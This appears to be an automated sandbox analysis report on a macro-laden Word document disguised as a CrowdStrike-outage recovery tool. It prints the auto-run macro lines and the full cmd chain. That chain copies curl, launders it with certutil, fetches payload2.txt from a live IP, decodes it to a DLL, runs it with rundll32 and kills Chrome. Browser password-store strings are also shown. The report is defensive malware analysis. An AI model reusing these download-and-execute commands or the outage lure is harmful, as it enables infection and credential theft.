Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp")	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c "	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell")	Name: MainFunc
Source: ~WRC0000.tmp.26.dr	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0000.tmp.26.dr	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "

Downloads suspicious files via Chrome

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)

Jump to dropped file

Office process queries suspicious COM object (likely to drop second stage)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\rundll32.exe

File deleted: C:\Windows\Temp\SGlzdG9yeQ==

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_00871535	13_2_00871535
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0089A8D8	13_2_0089A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0087A9B3	13_2_0087A9B3
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0088C1FD	13_2_0088C1FD
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0086E127	13_2_0086E127
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008ACAA0	13_2_008ACAA0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0087FAEC	13_2_0087FAEC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008B33B0	13_2_008B33B0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_00874415	13_2_00874415
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008825B8	13_2_008825B8
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C19250	16_2_00007FFD92C19250
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C95204	16_2_00007FFD92C95204
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C291B0	16_2_00007FFD92C291B0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF5730	16_2_00007FFD92BF5730
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C9B7E0	16_2_00007FFD92C9B7E0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C95A60	16_2_00007FFD92C95A60
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C2F940	16_2_00007FFD92C2F940
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF18C0	16_2_00007FFD92BF18C0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92CAFA20	16_2_00007FFD92CAFA20
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C99CA0	16_2_00007FFD92C99CA0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BEFE10	16_2_00007FFD92BEFE10
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF6120	16_2_00007FFD92BF6120
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C1A0A0	16_2_00007FFD92C1A0A0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF2210	16_2_00007FFD92BF2210
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BEEAA0	16_2_00007FFD92BEEAA0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF2E60	16_2_00007FFD92BF2E60
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BEED05	16_2_00007FFD92BEED05
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF0DA0	16_2_00007FFD92BF0DA0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C231D0	16_2_00007FFD92C231D0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C25170	16_2_00007FFD92C25170
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF5160	16_2_00007FFD92BF5160
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C1B190	16_2_00007FFD92C1B190
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C496B0	16_2_00007FFD92C496B0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C515E0	16_2_00007FFD92C515E0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C09960	16_2_00007FFD92C09960
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C2BCB0	16_2_00007FFD92C2BCB0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C23DE0	16_2_00007FFD92C23DE0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BFE330	16_2_00007FFD92BFE330
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BEE140	16_2_00007FFD92BEE140
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C5E0B0	16_2_00007FFD92C5E0B0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C32080	16_2_00007FFD92C32080
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C96250	16_2_00007FFD92C96250
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C3C160	16_2_00007FFD92C3C160
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BFE710	16_2_00007FFD92BFE710
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C3A7E0	16_2_00007FFD92C3A7E0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C947A0	16_2_00007FFD92C947A0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C747C0	16_2_00007FFD92C747C0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BFE520	16_2_00007FFD92BFE520
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C04540	16_2_00007FFD92C04540
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C36460	16_2_00007FFD92C36460
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C64B30	16_2_00007FFD92C64B30
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF4BC0	16_2_00007FFD92BF4BC0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C96B6E	16_2_00007FFD92C96B6E
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BFE900	16_2_00007FFD92BFE900
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C00860	16_2_00007FFD92C00860
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C16A00	16_2_00007FFD92C16A00
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C64CF0	16_2_00007FFD92C64CF0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C66E50	16_2_00007FFD92C66E50
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C96E10	16_2_00007FFD92C96E10
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C94D80	16_2_00007FFD92C94D80
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00841535	33_2_00841535
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0086A8D8	33_2_0086A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0084A9B3	33_2_0084A9B3
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0085C1FD	33_2_0085C1FD
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0083E127	33_2_0083E127
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087CAA0	33_2_0087CAA0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0084FAEC	33_2_0084FAEC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_008833B0	33_2_008833B0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00844415	33_2_00844415
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_008525B8	33_2_008525B8

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open	Name: Document_Open
Source: ~WRC0000.tmp.26.dr	OLE, VBA macro line: Sub Document_Open()

Document contains embedded VBA macros

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA macros: true
Source: harvardanglia2008officeonline.xsl.0.dr	OLE indicator, VBA macros: true
Source: mlaseventheditionofficeonline.xsl.0.dr	OLE indicator, VBA macros: true
Source: turabian.xsl.0.dr	OLE indicator, VBA macros: true
Source: ieee2006officeonline.xsl.0.dr	OLE indicator, VBA macros: true
Source: gostname.xsl.0.dr	OLE indicator, VBA macros: true
Source: APASixthEditionOfficeOnline.xsl.0.dr	OLE indicator, VBA macros: true
Source: sist02.xsl.0.dr	OLE indicator, VBA macros: true
Source: iso690nmerical.xsl.0.dr	OLE indicator, VBA macros: true
Source: gb.xsl.0.dr	OLE indicator, VBA macros: true
Source: iso690.xsl.0.dr	OLE indicator, VBA macros: true
Source: chicago.xsl.0.dr	OLE indicator, VBA macros: true
Source: gosttitle.xsl.0.dr	OLE indicator, VBA macros: true
Source: CatalogCacheMetaData.xml.26.dr	OLE indicator, VBA macros: true
Source: ~WRC0000.tmp.26.dr	OLE indicator, VBA macros: true

Document embeds suspicious OLE2 link

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Stream path 'VBA/__SRP_0' : http://172.104.160.126:8099\curl.txt\curl.exe/payload2.txt\mscorsvc.txt\mscorsvc.dllC:\Windows\Sys"tem32\cmd.exe /c$-encode$\cu-decode"$ -o$del&rl.exe &.bq.aSTART( rundll32&,DllMainexit

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: harvardanglia2008officeonline.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: mlaseventheditionofficeonline.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: turabian.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ieee2006officeonline.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gostname.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: APASixthEditionOfficeOnline.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sist02.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690nmerical.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gb.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: chicago.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gosttitle.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: CatalogCacheMetaData.xml.26.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C915E0 appears 132 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C26F90 appears 415 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C15F20 appears 56 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C2B840 appears 35 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C20ED0 appears 71 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C15810 appears 68 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C97390 appears 35 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92BEAA50 appears 36 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C27080 appears 332 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C90F70 appears 42 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C15FF0 appears 35 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C91110 appears 87 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C91570 appears 266 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C157A0 appears 36 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92CABF00 appears 47 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C127F0 appears 47 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C90FF0 appears 434 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0084201D appears 39 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0087201D appears 39 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0084D632 appears 246 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0083913E appears 64 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 00842564 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 008720E6 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0084D6AD appears 303 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0087251E appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0084251E appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0087D6AD appears 303 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0086913E appears 64 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 008420E6 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0087D632 appears 247 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 00872564 appears 48 times

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOCM@69/284@2/4

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_0086310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,

13_2_0086310D

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Office

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{EDECE918-A2EA-49DC-A414-445477A4F37D} - OProcSessId.dat

Jump to behavior

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, Word Document stream: true
Source: Element design set.dotx.0.dr	OLE indicator, Word Document stream: true
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	OLE indicator, Word Document stream: true
Source: Equations.dotx.0.dr	OLE indicator, Word Document stream: true
Source: Insight design set.dotx.0.dr	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, Word Document stream: true
Source: ~WRC0000.tmp.26.dr	OLE indicator, Word Document stream: true

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE document summary: title field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.dr	OLE document summary: edited time not present or 0
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr	OLE document summary: title field not present or empty
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr	OLE document summary: author field not present or empty
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr	OLE document summary: edited time not present or 0
Source: ~WRC0000.tmp.26.dr	OLE document summary: title field not present or empty

Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\xcopy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: rundll32.exe, 00000010.00000002.5553191262.0000020A7832A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A7835E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2777616664.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4258973771.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4258973771.0000027F6C366000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2777450961.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2778177784.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
